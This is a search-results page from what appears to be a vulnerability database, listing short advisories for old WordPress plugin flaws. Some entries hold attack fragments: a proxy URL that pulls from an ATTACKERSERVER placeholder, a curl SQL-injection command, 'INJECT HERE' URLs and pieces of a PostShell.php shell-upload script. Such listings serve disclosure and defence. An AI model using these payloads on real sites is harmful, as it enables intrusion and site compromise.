Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2014/04/25 12:0 a.m.18 views

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...

4.3CVSS1.1AI score0.00939EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/03/05 12:0 a.m.14 views

Barclaycart - Unauthenticated Shell Upload

The Barclaycart WordPress plugin was found to be vulnerable to an Unauthenticated Shell Upload security vulnerability, due to using a vulnerable version of the third-party uploadify dependency. This issue has been seen exploited in the wild. "@$uploadfile",...

0.4AI score
Exploits0References1
wpexploit
wpexploit
added 2013/11/29 12:0 a.m.21 views

OptimizePress Theme < 1.6 - Unauthenticated Arbitrary File Upload

The OptimizePress premium WordPress theme was vulnerable to Unauthenticated Arbitrary File Upload, which could allow unauthenticated attackers to compromise a WordPress site. This vulnerability has been seen exploited in the wild. The affected file was:...

6.8CVSS1.4AI score0.14802EPSS
Exploits3References2
wpexploit
wpexploit
added 2012/08/28 12:0 a.m.9 views

Plugin HD Webplayer <= 1.1 - SQL Injections

The last time it was checked the plugin was still affected and had been closed. http://example.com/wp-content/plugins/hd-webplayer/config.php?id=INJECT HERE http://example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=INJECT HERE...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2012/06/07 12:0 a.m.22 views

MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload

Attackers have been seen probing for the "/wp-content/plugins/mm-forms/includes/doajaxfileupload.php" file. PostShell.php "@$uploadfile"; curlsetopt$ch, CURLOPTRETURNTRANSFER, 1; $postResult = curlexec$ch; curlclose$ch; print "$postResult"; ? Shell Access :...

7.5CVSS1.6AI score0.11748EPSS
Exploits2References1
wpexploit
wpexploit
added 2012/06/07 12:0 a.m.23 views

Omni Secure Files 0.1.13 - Unauthenticated Arbitrary File Upload

This plugin came with the vulnerable plupload library and has been seen exploited in the wild. The vulnerable file is: http://www.example.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php...

1.1AI score
Exploits0References2
wpexploit
wpexploit
added 2012/06/01 12:0 a.m.13 views

Gallery 3.06 - Unauthenticated File Upload PHP Code Execution

The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. The vulnerable file was: http://www.example.com/wp-content/plugins/gallery-plugin/upload/php.php...

1.4AI score
Exploits0References1
wpexploit
wpexploit
added 2011/09/08 12:0 a.m.14 views

Community Events <= 1.2.1 - SQL Injection

The Community Events WordPress plugin was affected by a SQL Injection security vulnerability. curl --data "id=-1 AND EXTRACTVALUE1, CONCATCHAR58,@@version,CHAR58-- " http://www.site.com/wp-content/plugins/community-events/tracker.php...

1.3AI score
Exploits0References1
wpexploit
wpexploit
added 2007/04/29 12:0 a.m.50 views

myGallery <= 1.4b4 - Unauthenticated File Inclusion

The MySliderGallery WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability. This vulnerability has been seen exploited in the wild with the following payload:...

7.5CVSS1.2AI score0.62871EPSS
Exploits2References2
Total number of security vulnerabilities4359